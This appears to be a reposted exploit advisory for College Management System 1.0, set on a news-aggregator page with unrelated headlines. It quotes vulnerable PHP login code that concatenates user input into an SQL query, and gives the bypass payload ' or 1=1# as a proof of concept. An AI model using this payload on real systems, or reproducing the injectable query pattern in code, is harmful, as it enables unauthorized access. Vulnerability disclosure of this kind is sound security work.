College Management System 1.0 SQL Injection

College Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

# Exploit Title: college management system - SQL Injection Authentication Bypass
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linuxin login/login.php in line 8 :
$username=$_POST["email"];
$password=$_POST["password"];
$query="select * from login where user_id='$username' and Password='$password' ";
$result=mysqli_query($con,$query);
POC :
http://127.0.0.1/2/College-Management-System/login/login.php
username : ' or 1=1#
password : 123456

Defending Your Remote Workforce with Zero Trust Security

Researchers Find Bluetooth Signals Can be Fingerprinted to Track Smartphones

Vivek Ramaswamy mounts White House bid

Three Common Mistakes That May Sabotage Your Security Training

Microsoft Warns About Phishing Attacks by Russia-linked Hackers

M	T	W	T	F	S	S
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28	29	30	31

College Management System 1.0 SQL Injection

Bybmalandrone

Related posts:

You missed

Tim Scott launches bid to chair NRSC as GOP seeks to capitalize on new minority gains

Shutdown standoff looms in Congress’ final weeks before Trump’s return to White House

5 mistakes that doomed Kamala Harris’ campaign against Trump

Robes to the arena For Panthers, it’s a great fit

Shackle Media